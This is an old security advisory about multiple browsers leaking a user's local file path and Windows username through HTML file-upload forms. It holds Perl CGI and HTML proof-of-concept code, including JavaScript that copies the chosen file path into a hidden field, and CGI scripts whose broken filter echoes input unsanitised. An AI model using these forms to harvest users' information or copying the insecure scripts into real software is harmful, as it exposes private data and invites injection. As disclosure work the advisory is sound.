browserDisclose.txt

`Multi browser sensitive information disclosure  
  
I. DESCRIPTION:  
  
Mr.upken disclosed this issue publicly on 19th Feb. 2005.  
Here is his advisory.(language is Japanese)  
http://xxx.upken.jp/report/ieup/  
I have a few additional details to add to his original advisory.  
  
II. IMPACT:  
  
Disclosure of sensitive information to an unauthorised user.  
  
III. TECHNICAL DETAILS:  
  
RFC1867 is the standard definition of that "Browse..." button  
that you use to upload files to a Web server.  
It introduced the INPUT field type="file", which is that button,  
and also specified a multipart form encoding which is capable of  
encapsulating files for upload along with all the other fields  
on an upload form.  
  
As Mr.upken has mentioned in his advisory, there is a weakness in  
"Form-based File Upload in HTML".  
"When we use InternetExplorer" , he says ,"secret or sensitive  
information can be exposed by an malicious people."  
  
I have tested some examples, and it is found that Firefox, Opera,  
and InternetExplorer have a weakness.( tested on WindowsXPSp2 )  
  
IV. Proof of Concept [A].  
  
server-side Perl CGI.(ask.cgi)  
- ---------------------------  
#!/usr/bin/perl  
print "Content-Type: text/html\n\n";  
  
die if $ENV{CONTENT_LENGTH} > 100*1024;  
  
$objectname = "RFC1867";  
$boundary = <STDIN>;  
$boundary =~s /\r\n//;  
while(<STDIN>){  
if($_ =~ /$objectname/){  
~s/\r\n//;  
~s/"//g;  
@dum = split(/filename=/, $_);  
$rfc1867 = $dum[@dum - 1];  
}  
}  
&Filtertxt( $rfc1867 );  
print "$rfc1867\n";  
  
exit(0);  
  
sub Filtertxt {  
local( $ft ) = @_;  
$fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;  
return( $ft ) ;  
}  
- ---------------------------  
  
client-side FORM.  
- ---------------------------  
<form name="XA" method="POST" enctype="multipart/form-data"  
action="http://example.com/cgi-bin/ask.cgi">  
<input type="file" name="RFC1867">  
<input type="hidden" name="XB" value="HIDDEN">  
<input type=submit value="Upload">  
</form>  
- ---------------------------  
  
NOTE:  
Method is "POST".  
When we upload a some file,  
%USERNAME% , Path, etc... is disclosed.  
I guess that only IE has a weakness.  
  
  
V. Proof of Concept [B].  
  
server-side Perl CGI.(named ask2.cgi)  
- ---------------------------  
#!/usr/bin/perl  
  
if($ENV{'REQUEST_METHOD'} eq 'POST'){  
#reads inputted variables through POST  
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});  
}  
else{  
#reads inputted variables through GET  
$buffer = $ENV{'QUERY_STRING'};  
}  
  
#splits the variables at &  
@pairs = split(/&/, $buffer);  
foreach $pair (@pairs) {  
#sets the value and name of each var  
($name, $value) = split(/=/, $pair);  
#makes each + into a space  
$value =~ tr/+/ /;  
#URL decode  
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;  
#filter out bad characters & # < > " '  
$value = &Filtertxt( $value );  
#sets the varibles in a hash  
$FORM{$name} = $value;  
}  
  
#print html .  
print "Content-Type: text/html\n";  
print "\n";  
print "$FORM{'XB'}\n";  
print "<br>\n";  
print "$FORM{'RFC1867'}\n";  
  
exit(0);  
  
sub Filtertxt {  
local( $ft ) = @_;  
$fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;  
return( $ft ) ;  
}  
- ---------------------------  
  
client-side FORM.  
- ---------------------------  
<form name="XA" method="GET" enctype="multipart/form-data"  
action="http://example.com/cgi-bin/ask2.cgi">  
<input type="file" name="RFC1867">  
<input type="hidden" name="XB" value="HIDDEN">  
<input type=submit value="Upload">  
</form>  
- ---------------------------  
  
NOTE:  
Method is "GET".  
When we try to upload a some file,  
%USERNAME% , Path, etc... is disclosed.  
I guess that both Opera and IE have a weakness.  
  
  
V. Proof of Concept [C].  
server-side Perl CGI is as same as Proof of Concept [B].  
  
client-side FORM.  
- ---------------------------  
<form name="XA" method="GET" enctype="multipart/form-data"  
action="http://example.com/cgi-bin/ask2.cgi">  
<input type="file" name="RFC1867">  
<input type="hidden" name="XB" value="HIDDEN">  
<input type=submit value="Upload"  
onclick="document.XA.XB.value=document.XA.RFC1867.value;return true" >  
</form>  
- ---------------------------  
  
NOTE:  
Method is "GET".  
When we try to upload a some file,  
%USERNAME% , Path, etc... is disclosed.  
I guess that all Firefox,Opera and IE have a weakness,  
using evil JavaScript scripting.  
  
  
VI. Other browser on Other OS.  
not tested. But......  
  
  
VII. Is this a vulnerability?  
  
At once I had used InternetExplore as a FTP tool.  
Today, when I am testing PoC3, browsing upload file,  
using Firefox , I find  
"MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg"  
and upload it to another server.  
Then my monitor displays  
C:\Documents and Settings\%USERNAME%\Local Settings\  
Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg  
  
Oh,no. YB6J6PY3 !  
It is no matter. I guess this is NOT a vulnerability, maybe.  
  
  
VIII. Workaround  
  
Do not upload any file onto untrusted server.  
Do not attach any file ( while sending WebMAIL, posting ML,etc).  
With killing JavaScript , use Firefox.  
  
  
VIII. Credit  
  
Discovery: upken  
Additional Research: bitlance winter  
  
  
BEST REGARDS.  
  
--  
bitlance winter  
  
_________________________________________________________________  
Don’t just search. Find. Check out the new MSN Search!   
http://search.msn.click-url.com/go/onm00200636ave/direct/01/  
  
`